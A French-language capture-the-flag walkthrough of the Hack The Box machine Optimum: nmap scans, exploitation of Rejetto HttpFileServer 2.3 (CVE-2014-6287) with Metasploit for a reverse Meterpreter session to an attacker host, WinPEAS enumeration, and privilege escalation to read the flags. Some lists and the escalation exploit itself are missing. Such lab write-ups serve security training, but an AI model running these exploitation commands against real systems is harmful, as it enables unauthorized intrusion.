
Analyse de la machine Optimum de Hack The Box. Cette procédure pas à pas couvre l'exploitation de Rejetto HttpFileServer 2.3 (CVE-2014-6287) pour obtenir un accès initial, suivie d'une élévation de privilèges sur un hôte Windows à l'aide de techniques d'énumération et d'outils de post-exploitation.
Dans cette machine, l'objectif est d'obtenir un accès initial à un hôte Windows en exploitant un service web vulnérable, puis d'élever les privilèges pour récupérer le drapeau administrateur.
Le chemin d'attaque a impliqué :
Nous commençons par un scan complet des ports TCP pour identifier les services exposés.
nmap -Pn -n -p- --min-rate 5000 -T4 <TARGET_IP>
Le scan révèle le port 80 ouvert.
Ensuite, nous effectuons un scan de service et de version.
nmap -p80 -sSCV --min-rate 5000 -T4 <TARGET_IP>
Le résultat identifie le service suivant :
HttpFileServer 2.3
Ce service correspond à Rejetto HTTP File Server, un serveur web de partage de fichiers léger.
Après avoir recherché la version détectée, nous découvrons une vulnérabilité connue :
CVE-2014-6287
Cette vulnérabilité permet l'exécution de code à distance en raison d'une désinfection incorrecte des entrées.
Pour exploiter la vulnérabilité, nous utilisons Metasploit.
Lancer Metasploit :
msfconsole -q
Rechercher le module approprié :
search rejetto
Charger le module d'exploit :
use exploit/windows/http/rejetto_hfs_exec
Configurer les options requises :
set RHOSTS <TARGET_IP>
set RPORT <TARGET_PORT>
set LHOST <ATTACKER_IP>
set LPORT <ATTACKER_PORT>
run
Une fois exécuté, l'exploit fournit une session Meterpreter sur la machine cible.
Avec la session Meterpreter obtenue, nous naviguons dans le système de fichiers pour récupérer le drapeau utilisateur.
cd
cat user.txt
whoami
La sortie de la commande montre que nous sommes connectés en tant que :
kostas
Étant donné que cet utilisateur n'a pas de privilèges administratifs, nous procédons à l'élévation de privilèges.
Pour identifier les vecteurs potentiels d'élévation de privilèges, nous téléchargeons WinPEAS, un outil bien connu d'énumération d'élévation de privilèges sous Windows.
upload /usr/share/peass/winpeas/winPEAS.exe C:\Users\kostas\Desktop\wp.exe
Nous l'exécutons ensuite :
shell
.\wp.exe
La sortie révèle des informations utiles, notamment les identifiants associés à l'utilisateur kostas.
Après avoir examiné les vecteurs d'élévation possibles, nous utilisons le module Metasploit :
local_exploit_suggester
Charger le module :
use post/multi/recon/local_exploit_suggester
Configurer la session :
set SESSION <SESSION_NUMBER>
run
Ce module suggère des exploits locaux possibles pouvant être utilisés pour élever les privilèges.
Après avoir réussi à élever les privilèges, nous obtenons un shell avec des droits administratifs.
Vérification :
shell
whoami
Une fois les privilèges administratifs obtenus, nous naviguons vers le répertoire Administrateur pour récupérer le drapeau root.
cd \Users\Administrator
dir
cd Desktop
dir
type root.txt
Cette machine démontre plusieurs concepts importants de test d'intrusion :